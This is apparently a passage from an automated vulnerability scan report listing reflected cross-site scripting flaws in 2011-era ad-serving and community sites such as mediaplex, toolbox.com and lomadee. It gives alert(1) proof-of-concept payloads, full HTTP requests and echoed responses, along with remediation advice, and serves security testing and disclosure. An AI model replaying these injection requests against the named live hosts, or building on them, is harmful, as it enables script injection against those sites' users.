The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53688'%3balert(1)//72d940fd171 was submitted in the mpvc parameter. This input was echoed as 53688';alert(1)//72d940fd171 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112&mpt=7820111112&mpvc=53688'%3balert(1)//72d940fd171 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: keep-alive
Proxy-Connection: keep-alive
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 514e5"%3balert(1)//00a4ac78bc5 was submitted in the mpvc parameter. This input was echoed as 514e5";alert(1)//00a4ac78bc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112&mpt=7820111112&mpvc=514e5"%3balert(1)//00a4ac78bc5 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: keep-alive
Proxy-Connection: keep-alive
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2b6"><script>alert(1)</script>0af112df9e8 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 207be"-alert(1)-"0ae888ebe0c was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f28a'%3balert(1)//a5f5124cb44 was submitted in the mpck parameter. This input was echoed as 2f28a';alert(1)//a5f5124cb44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 498af"><script>alert(1)</script>583203e11e9 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 581b5"%3balert(1)//e9ef16281a8 was submitted in the mpvc parameter. This input was echoed as 581b5";alert(1)//e9ef16281a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8975'%3balert(1)//e027d6e1284 was submitted in the mpvc parameter. This input was echoed as a8975';alert(1)//e027d6e1284 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the imp_rvr_id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f26a5%3balert(1)//3183a6afcbc was submitted in the imp_rvr_id parameter. This input was echoed as f26a5;alert(1)//3183a6afcbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck252455582138f26a5;alert(1)//3183a6afcbc\">" ); var rvr_id=252455582138f26a5;alert(1)//3183a6afcbc; var mpserv; var mpi="img-cdn.mediaplex.com/0/"; var mpcrgif="711/131750/83635_US_2011_Q3_Pattern_Default_300x250.jpg"; var mpck="rover. ...[SNIP]...
The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50b78"%3balert(1)//0f2f4574bc1 was submitted in the imp_rvr_id parameter. This input was echoed as 50b78";alert(1)//0f2f4574bc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1ef8"%3balert(1)//edfbf2e626c was submitted in the mpck parameter. This input was echoed as e1ef8";alert(1)//edfbf2e626c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck252455582138\">" ); var rvr_id=252455582138; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... &adid=344372&fcid=344362&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252455582138&imp_rvr_id=252455582138e1ef8";alert(1)//edfbf2e626c"; var mpcke="<mpcke/> ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76f98"%3balert(1)//48ee27f9502 was submitted in the mpvc parameter. This input was echoed as 76f98";alert(1)//48ee27f9502 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck252455582138\">" ); var rvr_id=252455582138; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... QEdD1vc5y9wC-HCZRD1jHzEqQTlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEfhAAAQUCAQIAAAAACyUIjgAAAAA./cnd=!7wRZKAjXiAQQtNchGMnCBCAA/referrer=http%3A%2F%2Fweather.uk.msn.com/clickenc=76f98";alert(1)//48ee27f9502"; var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3Fq6qqqqrK8z-rqqqqqsrzPwAAAKCZmQFAmpmZmZmZAUCamZmZmZkBQEdD1vc5y9wC-HCZRD1jHzEqQTlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQ ...[SNIP]...
The value of the imp_rvr_id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b14b%3balert(1)//5a1cc938cb5 was submitted in the imp_rvr_id parameter. This input was echoed as 2b14b;alert(1)//5a1cc938cb5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=2524564911902b14b%3balert(1)//5a1cc938cb5&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577
document.write( " <div id=\"foldcheck2524564911902b14b;alert(1)//5a1cc938cb5\">" ); var rvr_id=2524564911902b14b;alert(1)//5a1cc938cb5; var mpserv; var mpi="img-cdn.mediaplex.com/0/"; var mpcrgif="711/131750/83823_US_2011_Q3_BTS_300x250.jpg"; var mpck="rover.ebay.com/rov ...[SNIP]...
The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdb86"%3balert(1)//a9fa3264758 was submitted in the imp_rvr_id parameter. This input was echoed as bdb86";alert(1)//a9fa3264758 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190bdb86"%3balert(1)//a9fa3264758&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e11fd"%3balert(1)//a07e3cbe07d was submitted in the mpck parameter. This input was echoed as e11fd";alert(1)//a07e3cbe07d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190e11fd"%3balert(1)//a07e3cbe07d&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577
document.write( " <div id=\"foldcheck252456491190\">" ); var rvr_id=252456491190; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... r_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190e11fd";alert(1)//a07e3cbe07d"; var mpcke="<mpcke/> ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 708c2"%3balert(1)//0158e76f8ed was submitted in the mpvc parameter. This input was echoed as 708c2";alert(1)//0158e76f8ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D708c2"%3balert(1)//0158e76f8ed HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577
document.write( " <div id=\"foldcheck252456491190\">" ); var rvr_id=252456491190; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA./cnd=!7wRZKAjXiAQQtNchGMnCBCAA/referrer=http%3A%2F%2Fweather.uk.msn.com/clickenc=708c2";alert(1)//0158e76f8ed"; var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQ ...[SNIP]...
2.134. http://it.toolbox.com/people/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /people/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b0a'-alert(1)-'52ca6c24b5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12e54'-alert(1)-'bcc5d1849aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 30294
Date: Tue, 02 Aug 2011 11:19:40 GMT
X-Varnish: 1397465601
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Cache-Control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> User Not Fo ...[SNIP]... <script>$.get('/api/t/2/rt/?u=http%3a%2f%2fit.toolbox.com%2fpeople%2ftypewriter12e54'-alert(1)-'bcc5d1849aa%2f&r='+document.referrer);</script> ...[SNIP]...
2.136. http://it.toolbox.com/people/typewriter/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /people/typewriter/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd3e6'-alert(1)-'36af26b13a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 64e49<script>alert(1)</script>2f37d82aa30 was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=940&ct=TOOLBOX_ROS64e49<script>alert(1)</script>2f37d82aa30&num=5&layt=560x350&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://networking.ittoolbox.com/groups/technical-functional/vpn-l/?cid=30913571
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Tue, 02 Aug 2011 11:16:06 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Tue, 02 Aug 2011 11:16:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 82
// Error: Unknown old section TOOLBOX_ROS64e49<script>alert(1)</script>2f37d82aa30
2.138. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jlinks.industrybrains.com
Path: /jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 61a70<script>alert(1)</script>4a502281a35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350&fmt=simp&61a70<script>alert(1)</script>4a502281a35=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://networking.ittoolbox.com/groups/technical-functional/vpn-l/?cid=30913571
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Tue, 02 Aug 2011 11:16:07 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Tue, 02 Aug 2011 11:16:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69
The value of the ;c request parameter is copied into the HTML document as plain text between tags. The payload 610ff<script>alert(1)</script>fb144f72136 was submitted in the ;c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.140. http://mfa.unilever.predicta.net/mrm-ad/ad/script/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mfa.unilever.predicta.net
Path: /mrm-ad/ad/script/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 694c7<script>alert(1)</script>20f6d3d94c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7d4a2<script>alert(1)</script>4b6bb94e076 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loc/locWrite.html?callback=json17d4a2<script>alert(1)</script>4b6bb94e076&ul=http%3A%2F%2Fmsn.buscape.com.br%2F&tt=MSN%20Shopping&re=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&us=502312310620110803131826&pa=3627&pd=BP&tm=1920x1200&cr=16-bit HTTP/1.1
Host: o.lomadee.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msn.buscape.com.br/
